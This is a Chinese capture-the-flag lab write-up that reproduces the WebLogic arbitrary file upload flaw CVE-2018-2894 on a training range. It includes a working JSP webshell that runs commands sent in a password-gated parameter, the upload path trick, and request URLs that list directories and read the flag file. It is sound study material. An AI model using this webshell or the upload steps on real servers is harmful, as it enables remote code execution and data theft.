【墨者学院】Weblogic任意文件上传漏洞复现第一题

0x00

0x01

 访问靶场是个404页面

 查阅相关资料后发现这是一个编号为CVE-2018-2894的Weblogic任意文件上传漏洞，其影响范围为(Oracle WebLogic Server，版本10.3.6.0，12.1.3.0，12.2.1.2，12.2.1.3。)
 根据介绍，该Weblogic管理端有两个页面能够进行任意文件上传，分别是

/ws_utc/begin.do
/ws_utc/config.do

 访问第一个页面会重定向到一个Weblogic管理登录页面


 其账号和密码在开启环境的时候已经给出了，所以不用找弱口令或者爆破，登录之后会来到Web服务测试客户端

 打开设置，修改当前工作目录为

/u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css

 然后到左边的安全栏下上传一个Webshell

 Webshell内容

<%
    if("023".equals(request.getParameter("pwd"))){
        java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
        int a = -1;
        byte[] b = new byte[2048];
        out.print("<pre>");
        while((a=in.read(b))!=-1){
            out.println(new String(b));
        }
        out.print("</pre>");
    }
%>

 然后访问

http://your ip:your port/ws_utc/css/config/keystore/1627876262133_test.jsp?pwd=023&i=ls%20/

 可以看到当前目录

 解释一下，因为之前工作目录设置的是静态目录，所以这里才能直接访问文件，至于文件名是按照 时间戳_文件名 的格式命名的，而时间戳可以通过BurpSuite抓包根据返回包来查看，也可以通过直接查看元素来得知

 查看目录，发现key.txt存在于 /u01/key.txt ，cat一下即可

http://219.153.49.228:41781/ws_utc/css/config/keystore/1627876262133_test.jsp?pwd=023&i=cat%20/u01/key.txt

0x02

 因为是第一次做这类题，甚至一开始打开靶场出现404，还以为是环境出错了，还向管理员提问，太憨了 >$\underline{x}$< 。而Weblogic登录页面，我一开始还以为要爆破得到用户名密码，结果就在打开靶场的时候就已经提供了，太憨了 >$\underline{x}$< x2。

0x03

 参考链接：
 1、13.Weblogic任意文件上传漏洞（CVE-2018-2894）复现
 2、Weblogic 任意文件上传漏洞（CVE-2018-2894）